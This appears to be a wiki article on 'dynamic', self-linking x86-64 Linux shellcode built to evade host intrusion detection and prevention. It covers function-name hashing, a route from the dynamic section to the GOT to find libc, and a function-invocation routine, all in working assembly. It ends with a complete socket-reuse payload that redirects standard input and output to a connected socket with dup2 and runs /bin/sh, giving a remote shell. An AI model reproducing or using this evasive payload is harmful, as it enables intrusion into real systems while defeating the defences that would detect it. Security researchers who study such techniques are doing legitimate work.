Difference between revisions of "Shellcode/Dynamic"
Revision as of 21:44, 22 November 2012
Dynamic, or self-linking, code is built to evade several types of host-layer countermeasures from security infrastructure (such as HIDS and HIPS engines). These countermeasures can prevent the execution of traditional 'unlinked' shellcode; dynamic code avoids them because it contains no interrupts, syscalls, or plaintext function strings.
Justification
Most security infrastructure components do runtime analysis based on the contents of RAM in both data and executable-marked segments. Moreover, many of these systems may even inspect kernel interrupts and syscalls from within the kernel. Others may monitor the functionality of _dl_runtime_resolve, a trampoline to _dl_fixup(), provided by ld-linux for a normal application to make shared library calls. Many of these systems will be alerted by applications trying to execute syscalls or interrupts without having them in their .text segments, or when an application attempts to use _dl_runtime_resolve, _dl_fixup, dlopen, dlclose, or dlsym to import a function not listed in its import table. Additionally, using functions such as dlopen() and dlsym() requires the use of plaintext strings, so an analyst can reverse engineer the payload quickly. This is another problem presented by traditional null-free shellcode.
A dynamic shellcode engine is able to solve these problems. By avoiding registers used by the C calling convention, it is possible to construct a linker that allows a developer to write dynamically self-linking code. This discards the need for interrupts and syscalls entirely, as a linker is able to import functions without assistance from the kernel. Additionally, function hashing is used to keep function names from appearing as string data, solving the problems with standard null-free shellcode listed above.
The C Calling convention's impact
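- The usual format for a system call or libc function invocation is shown below. The fourth argument is passed in %r10 for system calls; ordinary function calls under the System V AMD64 ABI pass it in %rcx instead: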
function_call(%rax) = function(%rdi, %rsi, %rdx, %r10, %r8, %r9) |
- The return value is usually placed in the %rax register.
Given the convention above, a linker that calls functions without syscalls does not need to reserve the following registers for function arguments:
%rax, %rbx, %rcx, %rbp, %r11, %r12, %r13, %r14, %r15 |
Most of these registers can be overwritten by different libc functions; however, %rbx is callee-saved, so libc preserves it for the caller. When writing a dynamic linker, function arguments must be preserved so that a developer can easily write dynamically integrated code. To that end, this linker takes %rbx as the base pointer to a library and %rbp for a function hash. This ensures that the developer maintains control over %rax, %rdi, %rsi, %rdx, %r10, %r8, and %r9. The %rcx register is used as the pointer to the invoke_function label. Developers should take care to preserve it when invoking functions that may destroy the register, or use a different register by changing the one popped in the __initialize_world label.
Function hashing
- Additional labels have been added to make this more readable.
calc_hash: preserve_regs: push %rax push %rdx initialize_regs: push %rdx pop %rax cld calc_hash_loop: lodsb rol $0xc, %edx add %eax, %edx test %al, %al jnz calc_hash_loop calc_done: push %rdx pop %rsi restore_regs: pop %rdx pop %rax |
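To make the rotate-and-add loop easier to follow, here is a minimal Python sketch of the same arithmetic. It assumes the accumulator (%edx) starts at zero, as it does after the `xor %rdx, %rdx` in the linker, and that the terminating null byte is also folded in, since `lodsb` and the rotate run once more before `test %al, %al` ends the loop. The names `rol32` and `calc_hash` here are illustrative helpers, not part of the original code.

```python
def rol32(value: int, count: int) -> int:
    """Rotate a 32-bit value left by `count` bits, like `rol` on %edx."""
    value &= 0xFFFFFFFF
    return ((value << count) | (value >> (32 - count))) & 0xFFFFFFFF


def calc_hash(name: bytes) -> int:
    """Model of the calc_hash loop: rotate by 0xc, then add the next byte.

    Assumes the accumulator starts at zero and that the trailing null
    byte is processed too (one final rotate with 0 added).
    """
    accumulator = 0
    for byte in name + b"\x00":
        accumulator = rol32(accumulator, 0xC)
        accumulator = (accumulator + byte) & 0xFFFFFFFF
    return accumulator


if __name__ == "__main__":
    # The article's interface example uses this value as the hash of exit().
    print(hex(calc_hash(b"exit")))
```

Under these assumptions the sketch reproduces the constants used later in the article for `exit` (0x696c4780) and `dup2` (0x70672750), which suggests it models the loop faithfully.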
Dynamic section traversal to the GOT
- We were able to locate a predictable offset to the first dynamic section header in the currently executing binary. It will always have a VMA of 0x00400130, so we use the code below to get there without nulls.
_start: push $0x400130ff pop %rbx shr $0x8, %ebx |
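The push-then-shift trick above can be checked with a few lines of Python. This is only a sketch of the arithmetic: the helper name `null_free_load` is hypothetical, and it assumes a 4-byte little-endian immediate, as `push` uses on x86-64.

```python
def null_free_load(immediate: int, shift: int = 8) -> int:
    """Return the value left in the register after `push imm32; pop; shr`.

    Raises ValueError if the encoded immediate would contain a null byte,
    which is the condition the padding byte (0xff) is there to avoid.
    """
    encoded = immediate.to_bytes(4, "little")
    if 0 in encoded:
        raise ValueError("immediate contains a null byte")
    return immediate >> shift


if __name__ == "__main__":
    # 0x400130ff encodes as ff 30 01 40; shifting right by 8 drops the
    # 0xff padding and leaves 0x00400130.
    print(hex(null_free_load(0x400130FF)))
```

Encoding 0x00400130 directly would put a null byte in the instruction stream, which is why the padded immediate is used.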
- Here, we extract the pointer to the dynamic section, then add its length to it. The GOT (Global Offset Table) is immediately after the dynamic section, so we can traverse to the GOT without reading its location from the headers. That's good, because the location of the GOT is not stored in the ELF or program headers.
fast_got: mov (%rbx), %rcx add 0x10(%rbx), %rcx |
Extracting a library pointer
- This code extracts a pointer to an arbitrary function inside of libc from the GOT. An alternative to libc is at 0x18(%rcx), which is a pointer to _dl_runtime_resolve from the ld-linux shared object library.
extract_pointer: mov 0x20(%rcx), %rbx |
- Now we just look for the base pointer of the binary we've selected for importing. We do this by looking for \x7f followed by the text string ELF. Because x86-64 is little-endian, the four bytes appear in reverse order when written as a 32-bit constant, so the comparison value is 0x464c457f. We step backwards one byte at a time until the base pointer has been isolated:
find_base: dec %rbx cmpl $0x464c457f, (%rbx) jne find_base |
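The byte order of the comparison constant and the backwards scan can be sketched in Python as follows. The buffer here is synthetic and the function name `find_base` simply mirrors the label above; it stands in for process memory purely for illustration.

```python
ELF_MAGIC = b"\x7fELF"

# Read as a little-endian 32-bit integer, the magic becomes 0x464c457f.
MAGIC_U32 = int.from_bytes(ELF_MAGIC, "little")


def find_base(memory: bytes, start: int) -> int:
    """Step backwards from `start` until a 4-byte read equals the magic.

    Mirrors the loop above: decrement first, then compare.
    """
    position = start
    while position > 0:
        position -= 1
        if int.from_bytes(memory[position:position + 4], "little") == MAGIC_U32:
            return position
    raise ValueError("ELF magic not found")


if __name__ == "__main__":
    # Synthetic image: 16 bytes of padding, the magic, then filler.
    image = b"\x00" * 16 + ELF_MAGIC + b"\x00" * 32
    print(hex(MAGIC_U32), find_base(image, 40))
```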
Staging the user defined code
- Now that a base pointer has been calculated, it is time to stage the developer or user-defined code. To make invoke_function reusable from a register, a getPc sequence pops the return address into %rcx, then jumps to the _world label and never returns. The address of invoke_function is thereby stored in the %rcx register, allowing developers to access it efficiently.
jmp startup __initialize_world: pop %rcx jmp _world startup: call __initialize_world invoke_function: ... _world: ; user-defined code goes here |
The interface
The runtime linker developed here allows user-defined code to start at the _world label. This example is a small dynamic snippet that, when combined with the linker's API, is equivalent to exit(0):
_world: push $0x696c4780 pop %rbp xor %rdi, %rdi call *%rcx |
The invoking of functions
- A comment has been provided in case developers forget the interface functionality:
; ; Takes a function hash in %rbp and base pointer in %rbx ; >Parses the dynamic section headers of the ELF64 image ; >Uses ROP to invoke the function on the way back to the ; -normal return location ; ; Returns results of function to invoke. ; |
- The first thing that we have to do is preserve all the registers that may interact with libc along with any registers that may be used by the linker. You'll notice that %rbp is preserved twice. This is because the first preservation is overwritten with a pointer to the desired function before returning. This allows us to return from the desired function back to developer-defined code.
invoke_function: push %rbp push %rbp push %rdx push %rdi push %rax push %rbx push %rsi |
- Now we zero the %rdx register and place the function hash into %rdi for future comparison.
set_regs: xor %rdx, %rdx push %rbp pop %rdi |
- Then the base pointer of the library to import from is placed into %rbp.
copy_base: push %rbx pop %rbp |
- This is a hack to get to our dynamic offset. We need to access 0x130(%rbx) for four bytes, but add it to an eight-byte register. We can't add to %ebx, because a write to %ebx clears the upper half of %rbx. Instead, we add the location of the dynamic section to the base pointer using indexed addressing mode.
read_dynamic_section: push $0x4c pop %rax add (%rbx, %rax, 4), %rbx |
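One way to read the 0x130 offset, offered as an interpretation rather than something the article states, is as a field inside the ELF64 program header table. The sketch below assumes the program headers start right after the 64-byte ELF header (e_phoff = 0x40, which is typical but not guaranteed) and that the dynamic segment is the fifth entry. Under those assumptions, the p_vaddr field of that entry lands at 0x130, which is also 0x4c scaled by 4.

```python
EHDR_SIZE = 0x40       # sizeof(Elf64_Ehdr)
PHDR_SIZE = 0x38       # sizeof(Elf64_Phdr)
P_VADDR_OFFSET = 0x10  # p_vaddr follows p_type (4), p_flags (4), p_offset (8)
P_FILESZ_OFFSET = 0x20 # p_filesz follows p_vaddr (8) and p_paddr (8)


def phdr_field_offset(index: int, field_offset: int) -> int:
    """File offset of a field in the index-th program header (0-based).

    Assumes the program header table directly follows the ELF header.
    """
    return EHDR_SIZE + index * PHDR_SIZE + field_offset


if __name__ == "__main__":
    vaddr_at = phdr_field_offset(4, P_VADDR_OFFSET)
    # Index register value (0x4c) times the scale factor (4).
    print(hex(vaddr_at), hex(0x4C * 4))
```

Using an index register with a scale of 4 also keeps the encoding free of null bytes: a literal 0x130 displacement does not fit in one byte, so it would be encoded as a 32-bit displacement containing zeros.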
check_dynamic_type: add $0x10, %rbx cmpb $0x5, (%rbx) jne check_dynamic_type |
string_table_found: mov 0x8(%rbx), %rax # %rax is now location of dynamic string table mov 0x18(%rbx), %rbx # %rbx is now a pointer to the symbol table. |
check_next_hash: add $0x18, %rbx push %rdx pop %rsi xorw (%rbx), %si add %rax, %rsi |
calc_hash: ... |
check_current_hash: cmp %esi, %edi jne check_next_hash |
found_hash: add 0x8(%rbx,%rdx,4), %rbp mov %rbp, 0x30(%rsp) pop %rsi pop %rbx pop %rax pop %rdi pop %rdx pop %rbp ret |
The dynamic shell
- Once added to the linker, this becomes a 270-byte dynamic port of the 115-byte socket-reuse payload. There are a few ways to optimize it that are left for the reader to discover.
_world: movl $0xf8cc01f7, %ebp # hash of getpeername() is in %rbp push $0x02 pop %rdi make_fd_struct: lea -0x14(%rsp), %rdx movb $0x10, (%rdx) lea 0x4(%rdx), %rsi # move struct into rsi loop: inc %di jz exit stack_fix: lea 0x14(%rdx), %rsp get_peer_name: sub $0x20, %rsp push %rcx call *%rcx # getpeername(counterfd,sockaddr_in) pop %rcx check_pn_success: test %al, %al jne loop # If we make it here, rbx and rax are 0 check_ip: push $0x1b pop %r8 mov $0xfeffff80, %eax not %eax cmpl %eax, (%rsp,%r8,4) jne loop check_port: movb $0x35, %r8b mov $0x2dfb, %ax not %eax cmpw %ax,(%rsp, %r8 ,2) # jne loop push $0x70672750 pop %rbp # Function hash of dup2() is in rbp reuse: xor %rdx, %rdx push %rdx push %rdx pop %rsi dup_loop: # redirect stdin, stdout, stderr to socket push %rcx call *%rcx # dup2(sockfd,std[err|in|out]); pop %rcx inc %esi cmp $0x4, %esi jne dup_loop movl $0xf66bbb37, %ebp # Place the function hash for execve() into %rbp xor %rdi, %rdi push %rdi push %rdi pop %rsi pop %rdx # Null out %rdx and %rdx (second and third argument) mov $0x68732f6e69622f6a,%rdi # move 'hs/nib/j' into %rdi shr $0x8,%rdi # null truncate the backwards value to '\0hs/nib/' push %rdi push %rsp pop %rdi # %rdi is now a pointer to '/bin/sh\0' call *%rcx # execve('/bin/sh',0,0); |